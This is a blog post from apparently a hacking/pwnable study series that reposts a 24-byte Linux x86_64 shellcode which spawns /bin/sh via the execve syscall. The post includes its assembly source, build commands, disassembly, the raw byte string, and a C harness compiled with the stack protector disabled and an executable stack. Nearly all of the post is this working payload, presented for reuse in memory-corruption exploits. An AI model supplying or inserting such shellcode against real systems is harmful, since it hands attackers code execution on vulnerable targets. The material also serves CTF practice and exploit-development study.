ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • x64/execve Shellcode (24 bytes)
    HACK/PWNABLE 2019. 4. 10. 11:28
    /*
    ;Category: Shellcode
    ;Title: GNU/Linux x86_64 - execve /bin/sh
    ;Author: m4n3dw0lf
    ;Github: https://github.com/m4n3dw0lf
    ;Date: 14/06/2017
    ;Architecture: Linux x86_64
    ;Tested on : #1 SMP Debian 4.9.18-1 (2017-03-30) x86_64 GNU/Linux
    
    ##########
    # Source #
    ##########
    
    section .text
      global _start
        _start:
          push rax
          xor rdx, rdx
          xor rsi, rsi
          mov rbx,'/bin//sh'
          push rbx
          push rsp
          pop rdi
          mov al, 59
          syscall
    
    
    #################################
    # Compile and execute with NASM #
    #################################
    
    nasm -f elf64 sh.s -o sh.o
    ld sh.o -o sh
    
    #########################
    # objdump --disassemble #
    #########################
    
    Disassembly of section .text:
    
    0000000000400080 <_start>:
      400080:	50                   	push   %rax
      400081:	48 31 d2             	xor    %rdx,%rdx
      400084:	48 31 f6             	xor    %rsi,%rsi
      400087:	48 bb 2f 62 69 6e 2f 	movabs $0x68732f2f6e69622f,%rbx
      40008e:	2f 73 68 
      400091:	53                   	push   %rbx
      400092:	54                   	push   %rsp
      400093:	5f                   	pop    %rdi
      400094:	b0 3b                	mov    $0x3b,%al
      400096:	0f 05                	syscall
    
    ######################
    # 24 Bytes Shellcode #
    ######################
    
    \x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05
    
    ########
    # Test #
    ########
    
    gcc -fno-stack-protector -z execstack shell.c -o shell
    
    */
    
    #include <stdio.h>
    
    unsigned char shellcode[] = \
    "\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";
    main()
    {
        int (*ret)() = (int(*)())shellcode;
        ret();
    }
    

     

    Rererence : https://www.exploit-db.com/exploits/42179

    'HACK > PWNABLE' 카테고리의 다른 글

    ROPGadget Search with gdb-peda  (0) 2019.04.21
    shellscript while with brute force  (0) 2019.04.21
    GDB attach with pwntool s  (0) 2019.04.09
    FSB TIPS  (0) 2019.03.24
    nc 서버 오픈(xinetd)  (0) 2019.01.29

    댓글 0

Designed by Tistory.